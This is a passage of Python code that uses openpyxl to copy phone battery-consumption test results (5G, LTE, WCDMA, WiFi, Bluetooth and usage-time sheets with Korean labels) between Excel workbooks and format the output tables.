sheet_out['A8'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A4:D6\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n for mCell in sheet_out[\"A9:D11\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A2:D11\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D']\n sheet_width_list = [25, 15.88, 17, 13.13]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n for i in [4, 9]:\n sheet_out['A' + str(i)].fill = self.brown_fill\n sheet_out['B' + str(i)].fill = self.brown_fill\n sheet_out['C' + str(i)].fill = self.brown_fill\n sheet_out['D' + str(i)].fill = self.brown_fill\n\n for i in [5, 6, 10, 11]:\n sheet_out['A' + str(i)].fill = self.gray_fill\n sheet_out['B' + str(i)].fill = self.apricot_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"MOS\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # DOU Tab\n def dou_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n list_input = []\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n col_sum = list(range(4, 16))\n col_a = [1, 2, 4, 7, 13, 16, 17]\n col_b = [2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]\n col_c = [2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]\n col_d = [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]\n col_e = [3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]\n i_sum = 0.0\n r_sum = 0.0\n t_sum = 0.0\n\n # get data from wb_input\n sheet_in = wb_input['배터리소모전류(DOU)']\n temp_data = []\n for i in col_a:\n if i == 1:\n temp_data.append(str(sheet_in['A' + str(i)].value))\n else:\n temp_data.append(str(sheet_in['A' + str(i + 1)].value))\n list_input.append(temp_data)\n\n temp_data = []\n for i in col_b:\n temp_data.append(str(sheet_in['B' + str(i + 1)].value))\n list_input.append(temp_data)\n\n temp_data = []\n for i in col_c:\n temp_data.append(str(sheet_in['C' + str(i + 1)].value))\n if i in col_sum:\n if self.isNumber(sheet_in['C' + str(i + 1)].value):\n t_sum = t_sum + float(sheet_in['C' + str(i + 1)].value)\n list_input.append(temp_data)\n\n temp_data = []\n for i in col_d:\n if i in col_sum:\n if self.isNumber(sheet_in['D' + str(i + 1)].value):\n i_sum = i_sum + float(sheet_in['D' + str(i + 1)].value)\n temp_data.append(round(float(sheet_in['D' + str(i + 1)].value), 1))\n else:\n temp_data.append(self.check_empty(sheet_in['D' + str(i + 1)].value))\n else:\n temp_data.append(self.check_empty(sheet_in['D' + str(i + 1)].value))\n list_input.append(temp_data)\n\n temp_data = []\n for i in col_e:\n if i in col_sum:\n if self.isNumber(sheet_in['E' + str(i + 1)].value):\n r_sum = r_sum + float(sheet_in['E' + str(i + 1)].value)\n temp_data.append(round(float(sheet_in['E' + str(i + 1)].value), 1))\n else:\n temp_data.append(self.check_empty(sheet_in['E' + str(i + 1)].value))\n else:\n temp_data.append(self.check_empty(sheet_in['E' + str(i + 1)].value))\n list_input.append(temp_data)\n\n # input the data on output sheet\n sheet_out = wb_output['배터리소모전류(DOU)']\n\n for idx_2, item2 in enumerate(list_input):\n\n if idx_2 == 0:\n for i in range(len(item2)):\n sheet_out['A'+str(col_a[i])] = item2[i]\n elif idx_2 == 1:\n for i in range(len(item2)):\n sheet_out['B'+str(col_b[i])] = item2[i]\n elif idx_2 == 2:\n for i in range(len(item2)):\n sheet_out['C'+str(col_c[i])] = item2[i]\n elif idx_2 == 3:\n for i in range(len(item2)):\n sheet_out['D'+str(col_d[i])] = item2[i]\n else:\n for i in range(len(item2)):\n sheet_out['E'+str(col_e[i])] = item2[i]\n\n # fill rest values\n sheet_out.merge_cells('A1:E1')\n sheet_out.merge_cells('A2:A3')\n sheet_out.merge_cells('B2:B3')\n sheet_out.merge_cells('C2:C3')\n sheet_out.merge_cells('D2:E2')\n sheet_out.merge_cells('A4:A6')\n sheet_out.merge_cells('A7:A12')\n sheet_out.merge_cells('A13:A15')\n sheet_out.merge_cells('A16:B16')\n sheet_out.merge_cells('A17:C17')\n sheet_out.merge_cells('D17:E17')\n\n sheet_out['A16'] = '소계'\n if str(t_sum) == '0' or str(t_sum) == '0.0':\n sheet_out['C16'] = ''\n else:\n sheet_out['C16'] = round(t_sum, 1)\n\n if str(r_sum) == '0' or str(r_sum) == '0.0':\n sheet_out['E16'] = ''\n else:\n sheet_out['E16'] = round(r_sum, 1)\n\n if str(i_sum) == '0' or str(i_sum) == '0.0':\n sheet_out['D16'] = ''\n else:\n sheet_out['D16'] = round(i_sum, 1)\n\n sheet_out['A17'] = '사용시간'\n sheet_out['D17'] = str(round(self.battery_spec/r_sum, 2))+\"일\"\n\n self.setPrintText('/s {}번 파일 \"베터리소모전류(DOU)\" 테이터 입력 완료 /e'.format(idx+1))\n\n if self.opFlag:\n\n # all cell aligment adjust\n for mCell in sheet_out[\"A1:E17\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A2:E17\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A2:E17\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each coloum width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D', 'E']\n sheet_width_list = [10.25, 27.38, 15.5, 17, 17]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n sheet_out['A2'].fill = self.brown_fill\n sheet_out['B2'].fill = self.brown_fill\n sheet_out['C2'].fill = self.brown_fill\n sheet_out['D2'].fill = self.brown_fill\n sheet_out['D3'].fill = self.brown_fill\n sheet_out['E3'].fill = self.brown_fill\n sheet_out['A16'].fill = self.light_brown_fill\n sheet_out['C16'].fill = self.light_brown_fill\n sheet_out['D16'].fill = self.light_brown_fill\n sheet_out['E16'].fill = self.light_brown_fill\n sheet_out['A17'].fill = self.brown_fill\n sheet_out['D17'].fill = self.brown_fill\n\n for i in range(4, 16):\n sheet_out['A' + str(i)].fill = self.gray_fill\n sheet_out['B' + str(i)].fill = self.gray_fill\n sheet_out['C' + str(i)].fill = self.gray_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"베터리소모전류(DOU)\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # 베터리소모전류 Tab\n def bat_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n col_out = ['Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'AA', 'AB']\n\n # get data from wb_input\n sheet_in = wb_input['배터리소모전류']\n #option setting wb.output\n sheet_out = wb_output['배터리소모전류 세부데이터']\n\n # sheet row 1 handle\n sheet_out.merge_cells('A1:P1')\n sheet_out['A1'] = '베터리소모전류 결과'\n # sheet row 3~5 handle\n sheet_out['A3'] = '▣ 5G 측정내역'\n sheet_out.merge_cells('A4:A5')\n sheet_out['A4'] = '차수'\n sheet_out.merge_cells('B4:B5')\n sheet_out['B4'] = '시료번호'\n sheet_out.merge_cells('C4:C5')\n sheet_out['C4'] = '베터리용량'\n sheet_out.merge_cells('D4:D5')\n sheet_out['D4'] = '측정채널'\n sheet_out.merge_cells('E4:H4')\n sheet_out['E4'] = sheet_in['E8'].value\n sheet_out.merge_cells('I4:L4')\n sheet_out['I4'] = sheet_in['I8'].value\n sheet_out.merge_cells('M4:P4')\n sheet_out['M4'] = sheet_in['M8'].value\n\n sheet_out.merge_cells('E5:F5')\n sheet_out['E5'] = sheet_in['E9'].value\n sheet_out.merge_cells('G5:H5')\n sheet_out['G5'] = sheet_in['G9'].value\n sheet_out.merge_cells('I5:J5')\n sheet_out['I5'] = sheet_in['I9'].value\n sheet_out.merge_cells('K5:L5')\n sheet_out['K5'] = sheet_in['K9'].value\n sheet_out.merge_cells('M5:N5')\n sheet_out['M5'] = sheet_in['M9'].value\n sheet_out.merge_cells('O5:P5')\n sheet_out['O5'] = sheet_in['O9'].value\n\n # sheet row 6~7 handle\n sheet_out.merge_cells('A6:D7')\n sheet_out['A6'] = 'SKT 기준'\n for col in ['E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']:\n sheet_out[col + '6'] = sheet_in[col+'10'].value\n sheet_out[col + '7'] = sheet_in[col+'11'].value\n\n # sheet row 8~9 handle\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']:\n\n if col in ['A', 'B', 'C', 'D']:\n sheet_out[col + '8'] = sheet_in[col + '12'].value\n sheet_out[col + '9'] = sheet_in[col + '13'].value\n else:\n # row 8\n if self.isNumber(sheet_in[col + '12'].value):\n sheet_out[col + '8'] = self.check_num(round(float(sheet_in[col + '12'].value), 2))\n else:\n sheet_out[col + '8'] = self.check_empty(sheet_in[col + '12'].value)\n\n # row 9\n if self.isNumber(sheet_in[col + '13'].value):\n sheet_out[col + '9'] = self.check_num(round(float(sheet_in[col + '13'].value), 2))\n else:\n sheet_out[col + '9'] = self.check_empty(sheet_in[col + '13'].value)\n\n # sheet row 12~15 handle\n sheet_out.merge_cells('A10:A11')\n sheet_out['A10'] = '차수'\n sheet_out.merge_cells('B10:B11')\n sheet_out['B10'] = '시료번호'\n sheet_out.merge_cells('C10:C11')\n sheet_out['C10'] = '베터리용량'\n sheet_out.merge_cells('D10:D11')\n sheet_out['D10'] = '측정채널'\n\n sheet_out.merge_cells('E10:F10')\n sheet_out['E10'] = sheet_in['Q8'].value\n sheet_out.merge_cells('G10:H10')\n sheet_out['G10'] = sheet_in['S8'].value\n sheet_out.merge_cells('I10:J10')\n sheet_out['I10'] = sheet_in['U8'].value\n sheet_out.merge_cells('K10:L10')\n sheet_out['K10'] = sheet_in['W8'].value\n sheet_out.merge_cells('M10:N10')\n sheet_out['M10'] = sheet_in['Y8'].value\n sheet_out.merge_cells('O10:P10')\n sheet_out['O10'] = sheet_in['AA8'].value\n\n sheet_out.merge_cells('E11:F11')\n sheet_out['E11'] = sheet_in['Q9'].value\n sheet_out.merge_cells('G11:H11')\n sheet_out['G11'] = sheet_in['S9'].value\n sheet_out.merge_cells('I11:J11')\n sheet_out['I11'] = sheet_in['U9'].value\n sheet_out.merge_cells('K11:L11')\n sheet_out['K11'] = sheet_in['W9'].value\n sheet_out.merge_cells('M11:N11')\n sheet_out['M11'] = sheet_in['Y9'].value\n sheet_out.merge_cells('O11:P11')\n sheet_out['O11'] = sheet_in['AA9'].value\n\n # sheet row 12~13 handle\n sheet_out.merge_cells('A12:D13')\n sheet_out['A12'] = 'SKT 기준'\n\n for i, col in enumerate(['E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']):\n sheet_out[col + '12'] = sheet_in[col_out[i] + '10'].value\n sheet_out[col + '13'] = sheet_in[col_out[i] + '11'].value\n\n # sheet row 14~15 handle\n for i, col in enumerate(['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']):\n\n if col in ['A', 'B', 'C', 'D']:\n sheet_out[col + '14'] = sheet_in[col + '12'].value\n sheet_out[col + '15'] = sheet_in[col + '13'].value\n else:\n # row 14\n if self.isNumber(sheet_in[col_out[i-4] + '12'].value):\n sheet_out[col + '14'] = self.check_num(round(float(sheet_in[col_out[i-4] + '12'].value), 2))\n else:\n sheet_out[col + '14'] = self.check_empty(sheet_in[col_out[i-4] + '12'].value)\n\n # row 15\n if self.isNumber(sheet_in[col_out[i-4] + '13'].value):\n sheet_out[col + '15'] = self.check_num(round(float(sheet_in[col_out[i-4] + '13'].value), 2))\n else:\n sheet_out[col + '15'] = self.check_empty(sheet_in[col_out[i-4] + '13'].value)\n\n # sheet row 17~19 handle\n sheet_out['A17'] = '▣ LTE 측정내역'\n sheet_out.merge_cells('A18:A19')\n sheet_out['A18'] = '차수'\n sheet_out.merge_cells('B18:B19')\n sheet_out['B18'] = '시료번호'\n sheet_out.merge_cells('C18:C19')\n sheet_out['C18'] = '베터리용량'\n sheet_out.merge_cells('D18:D19')\n sheet_out['D18'] = '측정채널'\n sheet_out.merge_cells('E18:H18')\n sheet_out['E18'] = sheet_in['E16'].value\n sheet_out.merge_cells('I18:L18')\n sheet_out['I18'] = sheet_in['I16'].value\n sheet_out.merge_cells('M18:P18')\n sheet_out['M18'] = sheet_in['M16'].value\n\n sheet_out.merge_cells('E19:F19')\n sheet_out['E19'] = sheet_in['E17'].value\n sheet_out.merge_cells('G19:H19')\n sheet_out['G19'] = sheet_in['G17'].value\n sheet_out.merge_cells('I19:J19')\n sheet_out['I19'] = sheet_in['I17'].value\n sheet_out.merge_cells('K19:L19')\n sheet_out['K19'] = sheet_in['K17'].value\n sheet_out.merge_cells('M19:N19')\n sheet_out['M19'] = sheet_in['M17'].value\n sheet_out.merge_cells('O19:P19')\n sheet_out['O19'] = sheet_in['O17'].value\n\n # sheet row 20~21 handle\n sheet_out.merge_cells('A20:D21')\n sheet_out['A20'] = 'SKT 기준'\n for col in ['E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']:\n sheet_out[col + '20'] = sheet_in[col+'18'].value\n sheet_out[col + '21'] = sheet_in[col+'19'].value\n\n # sheet row 22~23 handle\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']:\n\n if col in ['A', 'B', 'C', 'D']:\n sheet_out[col + '22'] = sheet_in[col + '12'].value\n sheet_out[col + '23'] = sheet_in[col + '13'].value\n else:\n # row 22\n if self.isNumber(sheet_in[col + '20'].value):\n sheet_out[col + '22'] = self.check_num(round(float(sheet_in[col + '20'].value), 2))\n else:\n sheet_out[col + '22'] = self.check_empty(sheet_in[col + '20'].value)\n\n # row 23\n if self.isNumber(sheet_in[col + '21'].value):\n sheet_out[col + '23'] = self.check_num(round(float(sheet_in[col + '21'].value), 2))\n else:\n sheet_out[col + '23'] = self.check_empty(sheet_in[col + '21'].value)\n\n # sheet row 24~25 handle\n sheet_out.merge_cells('A24:A25')\n sheet_out['A24'] = '차수'\n sheet_out.merge_cells('B24:B25')\n sheet_out['B24'] = '시료번호'\n sheet_out.merge_cells('C24:C25')\n sheet_out['C24'] = '베터리용량'\n sheet_out.merge_cells('D24:D25')\n sheet_out['D24'] = '측정채널'\n\n sheet_out.merge_cells('E24:F24')\n sheet_out['E24'] = sheet_in['Q16'].value\n sheet_out.merge_cells('G24:H24')\n sheet_out['G24'] = sheet_in['S16'].value\n sheet_out.merge_cells('I24:J24')\n sheet_out['I24'] = sheet_in['U16'].value\n sheet_out.merge_cells('K24:L24')\n sheet_out['K24'] = sheet_in['W16'].value\n\n sheet_out.merge_cells('E25:F25')\n sheet_out['E25'] = sheet_in['Q17'].value\n sheet_out.merge_cells('G25:H25')\n sheet_out['G25'] = sheet_in['S17'].value\n sheet_out.merge_cells('I25:J25')\n sheet_out['I25'] = sheet_in['U17'].value\n sheet_out.merge_cells('K25:L25')\n sheet_out['K25'] = sheet_in['W17'].value\n\n # sheet row 26~27 handle\n sheet_out.merge_cells('A26:D27')\n sheet_out['A26'] = 'SKT 기준'\n\n for i, col in enumerate(['E', 'F', 'G', 'H', 'I', 'J', 'K', 'L']):\n sheet_out[col + '26'] = sheet_in[col_out[i] + '18'].value\n sheet_out[col + '27'] = sheet_in[col_out[i] + '19'].value\n\n # sheet row 28~29 handle\n for i, col in enumerate(['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L']):\n\n if col in ['A', 'B', 'C', 'D']:\n sheet_out[col + '28'] = sheet_in[col + '12'].value\n sheet_out[col + '29'] = sheet_in[col + '13'].value\n else:\n # row 28\n if self.isNumber(sheet_in[col_out[i-4] + '20'].value):\n sheet_out[col + '28'] = self.check_num(round(float(sheet_in[col_out[i-4] + '20'].value), 2))\n else:\n sheet_out[col + '28'] = self.check_empty(sheet_in[col_out[i-4] + '20'].value)\n # row 29\n if self.isNumber(sheet_in[col_out[i-4] + '21'].value):\n sheet_out[col + '29'] = self.check_num(round(float(sheet_in[col_out[i-4] + '21'].value), 2))\n else:\n sheet_out[col + '29'] = self.check_empty(sheet_in[col_out[i-4] + '21'].value)\n\n\n # sheet row 31~33 handle\n sheet_out['A31'] = '▣ WCDMA 측정내역'\n sheet_out.merge_cells('A32:A33')\n sheet_out['A32'] = '차수'\n sheet_out.merge_cells('B32:B33')\n sheet_out['B32'] = '시료번호'\n sheet_out.merge_cells('C32:C33')\n sheet_out['C32'] = '베터리용량'\n sheet_out.merge_cells('D32:D33')\n sheet_out['D32'] = '측정채널'\n\n sheet_out.merge_cells('E32:F32')\n sheet_out['E32'] = sheet_in['E24'].value\n sheet_out.merge_cells('G32:J32')\n sheet_out['G32'] = sheet_in['G24'].value\n sheet_out.merge_cells('K32:L32')\n sheet_out['K32'] = sheet_in['K24'].value\n\n sheet_out.merge_cells('E33:F33')\n sheet_out['E33'] = sheet_in['E25'].value\n sheet_out.merge_cells('G33:H33')\n sheet_out['G33'] = sheet_in['G25'].value\n sheet_out.merge_cells('I33:J33')\n sheet_out['I33'] = sheet_in['I25'].value\n sheet_out.merge_cells('K33:L33')\n sheet_out['K33'] = sheet_in['K25'].value\n\n # sheet row 34~35 handle\n sheet_out.merge_cells('A34:D35')\n sheet_out['A34'] = 'SKT 기준'\n for col in ['E', 'F', 'G', 'H', 'I', 'J', 'K', 'L']:\n sheet_out[col + '34'] = sheet_in[col+'26'].value\n sheet_out[col + '35'] = sheet_in[col+'27'].value\n\n # sheet row 36~37 handle\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L']:\n\n if col in ['A', 'B', 'C', 'D']:\n sheet_out[col + '36'] = sheet_in[col + '12'].value\n sheet_out[col + '37'] = sheet_in[col + '13'].value\n else:\n # row 36\n if self.isNumber(sheet_in[col + '28'].value):\n sheet_out[col + '36'] = self.check_num(round(float(sheet_in[col + '28'].value), 2))\n else:\n sheet_out[col + '36'] = self.check_empty(sheet_in[col + '28'].value)\n # row 37\n if self.isNumber(sheet_in[col + '29'].value):\n sheet_out[col + '37'] = self.check_num(round(float(sheet_in[col + '29'].value), 2))\n else:\n sheet_out[col + '37'] = self.check_empty(sheet_in[col + '29'].value)\n\n # sheet row 39~41 handle\n sheet_out['A39'] = '▣ WiFi 측정내역'\n sheet_out.merge_cells('A40:A41')\n sheet_out['A40'] = '차수'\n sheet_out.merge_cells('B40:B41')\n sheet_out['B40'] = '시료번호'\n sheet_out.merge_cells('C40:C41')\n sheet_out['C40'] = '베터리용량'\n sheet_out.merge_cells('D40:D41')\n sheet_out['D40'] = '측정채널'\n\n sheet_out.merge_cells('E40:F40')\n sheet_out['E40'] = sheet_in['E32'].value\n sheet_out.merge_cells('G40:H40')\n sheet_out['G40'] = sheet_in['G32'].value\n sheet_out.merge_cells('I40:J40')\n sheet_out['I40'] = sheet_in['I32'].value\n sheet_out.merge_cells('K40:L40')\n sheet_out['K40'] = sheet_in['K32'].value\n sheet_out.merge_cells('M40:N40')\n sheet_out['M40'] = sheet_in['M32'].value\n\n sheet_out.merge_cells('E41:F41')\n sheet_out['E41'] = sheet_in['E33'].value\n sheet_out.merge_cells('G41:H41')\n sheet_out['G41'] = sheet_in['G33'].value\n sheet_out.merge_cells('I41:J41')\n sheet_out['I41'] = sheet_in['I33'].value\n sheet_out.merge_cells('K41:L41')\n sheet_out['K41'] = sheet_in['K33'].value\n sheet_out.merge_cells('M41:N41')\n sheet_out['M41'] = sheet_in['M33'].value\n\n # sheet row 42~43 handle\n sheet_out.merge_cells('A42:D43')\n sheet_out['A42'] = 'SKT 기준'\n for col in ['E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N']:\n sheet_out[col + '42'] = sheet_in[col+'34'].value\n sheet_out[col + '43'] = sheet_in[col+'35'].value\n\n # sheet row 44~45 handle\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N']:\n\n if col in ['A', 'B', 'C', 'D']:\n sheet_out[col + '44'] = sheet_in[col + '12'].value\n sheet_out[col + '45'] = sheet_in[col + '13'].value\n else:\n # row 44\n if self.isNumber(sheet_in[col + '36'].value):\n sheet_out[col + '44'] = self.check_num(round(float(sheet_in[col + '36'].value), 2))\n else:\n sheet_out[col + '44'] = self.check_empty(sheet_in[col + '36'].value)\n # row 45\n if self.isNumber(sheet_in[col + '37'].value):\n sheet_out[col + '45'] = self.check_num(round(float(sheet_in[col + '37'].value), 2))\n else:\n sheet_out[col + '45'] = self.check_empty(sheet_in[col + '37'].value)\n\n # sheet row 47~49 handle\n sheet_out['A47'] = '▣ BlueTooth 측정내역'\n sheet_out.merge_cells('A48:A49')\n sheet_out['A48'] = '차수'\n sheet_out.merge_cells('B48:B49')\n sheet_out['B48'] = '시료번호'\n sheet_out.merge_cells('C48:C49')\n sheet_out['C48'] = '베터리용량'\n sheet_out.merge_cells('D48:D49')\n sheet_out['D48'] = '측정채널'\n sheet_out.merge_cells('E48:N48')\n sheet_out['E48'] = sheet_in['E40'].value\n\n sheet_out.merge_cells('E49:F49')\n sheet_out['E49'] = sheet_in['E41'].value\n sheet_out.merge_cells('G49:H49')\n sheet_out['G49'] = sheet_in['G41'].value\n sheet_out.merge_cells('I49:J49')\n sheet_out['I49'] = sheet_in['I41'].value\n sheet_out.merge_cells('K49:L49')\n sheet_out['K49'] = sheet_in['K41'].value\n sheet_out.merge_cells('M49:N49')\n sheet_out['M49'] = sheet_in['M41'].value\n\n # sheet row 50~51 handle\n sheet_out.merge_cells('A50:D51')\n sheet_out['A50'] = 'SKT 기준'\n\n for col in ['E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N']:\n sheet_out[col + '50'] = sheet_in[col+'42'].value\n sheet_out[col + '51'] = sheet_in[col+'43'].value\n\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N']:\n\n # sheet row 52~53 handle\n if col in ['A', 'B', 'C', 'D']:\n sheet_out[col + '52'] = sheet_in[col + '12'].value\n sheet_out[col + '53'] = sheet_in[col + '13'].value\n else:\n # row 52\n if self.isNumber(sheet_in[col + '44'].value):\n sheet_out[col + '52'] = self.check_num(round(float(sheet_in[col + '44'].value), 2))\n else:\n sheet_out[col + '52'] = self.check_empty(sheet_in[col + '44'].value)\n # row 53\n if self.isNumber(sheet_in[col + '45'].value):\n sheet_out[col + '53'] = self.check_num(round(float(sheet_in[col + '45'].value), 2))\n else:\n sheet_out[col + '53'] = self.check_empty(sheet_in[col + '45'].value)\n\n self.setPrintText('/s {}번 파일 \"배터리소모전류 세부데이터\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:Z53\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n # top alignment adjust\n sheet_out['A3'].alignment = self.top_alignment\n sheet_out['A17'].alignment = self.top_alignment\n sheet_out['A31'].alignment = self.top_alignment\n sheet_out['A39'].alignment = self.top_alignment\n sheet_out['A47'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A4:P15\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A18:P23\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A24:L29\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A32:L37\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A40:N45\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A48:N53\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A3:P53\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N',\n 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n sheet_width_list = [29.88, 11.38, 11.38, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11,\n 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']:\n\n sheet_out[col + '4'].fill = self.brown_fill\n sheet_out[col + '5'].fill = self.brown_fill\n sheet_out[col + '6'].fill = self.apricot_fill\n sheet_out[col + '7'].fill = self.apricot_fill\n sheet_out[col + '10'].fill = self.brown_fill\n sheet_out[col + '11'].fill = self.brown_fill\n sheet_out[col + '12'].fill = self.apricot_fill\n sheet_out[col + '13'].fill = self.apricot_fill\n sheet_out[col + '18'].fill = self.brown_fill\n sheet_out[col + '19'].fill = self.brown_fill\n sheet_out[col + '20'].fill = self.apricot_fill\n sheet_out[col + '21'].fill = self.apricot_fill\n\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N']:\n\n sheet_out[col + '40'].fill = self.brown_fill\n sheet_out[col + '41'].fill = self.brown_fill\n sheet_out[col + '42'].fill = self.apricot_fill\n sheet_out[col + '43'].fill = self.apricot_fill\n sheet_out[col + '48'].fill = self.brown_fill\n sheet_out[col + '49'].fill = self.brown_fill\n sheet_out[col + '50'].fill = self.apricot_fill\n sheet_out[col + '51'].fill = self.apricot_fill\n\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L']:\n\n sheet_out[col + '24'].fill = self.brown_fill\n sheet_out[col + '25'].fill = self.brown_fill\n sheet_out[col + '26'].fill = self.apricot_fill\n sheet_out[col + '27'].fill = self.apricot_fill\n sheet_out[col + '32'].fill = self.brown_fill\n sheet_out[col + '33'].fill = self.brown_fill\n sheet_out[col + '34'].fill = self.apricot_fill\n sheet_out[col + '35'].fill = self.apricot_fill\n\n for i in [8, 9, 14, 15, 22, 23, 28, 29, 36, 37, 44, 45, 52, 53]:\n\n sheet_out['A' + str(i)].fill = self.gray_fill\n sheet_out['B' + str(i)].fill = self.gray_fill\n sheet_out['C' + str(i)].fill = self.gray_fill\n sheet_out['D' + str(i)].fill = self.gray_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"배터리소모전류 세부데이터\" 시트 스타일 적용 완료 /e'.format(idx+1))\n\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # 베터리소모전류(시간) Tab\n def time_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_out_files):\n\n wb_output = openpyxl.load_workbook(item, data_only=True)\n\n # get data from wb_input\n sheet_in = wb_output['배터리소모전류 세부데이터']\n #option setting wb.output\n sheet_out = wb_output['배터리소모전류(시간)']\n target = sheet_in['A8'].value\n ref = sheet_in['A9'].value\n\n # sheet row 1 handle\n sheet_out.merge_cells('A1:H1')\n sheet_out['A1'] = '배터리소모전류 결과 (시간)'\n # sheet row 3~5 handle\n sheet_out['A3'] = '▣ 5G '\n sheet_out.merge_cells('A4:A5')\n sheet_out['A4'] = '구분'\n sheet_out.merge_cells('B4:C4')\n sheet_out['B4'] = sheet_in['E4'].value\n sheet_out.merge_cells('D4:E4')\n sheet_out['D4'] = sheet_in['I4'].value\n sheet_out.merge_cells('F4:H4')\n sheet_out['F4'] = sheet_in['M4'].value\n\n sheet_out['B5'] = sheet_in['E5'].value\n sheet_out['C5'] = sheet_in['G5'].value\n sheet_out['D5'] = sheet_in['I5'].value\n sheet_out['E5'] = sheet_in['K5'].value\n sheet_out['F5'] = sheet_in['M5'].value\n sheet_out['G5'] = sheet_in['O5'].value\n sheet_out['H5'] = 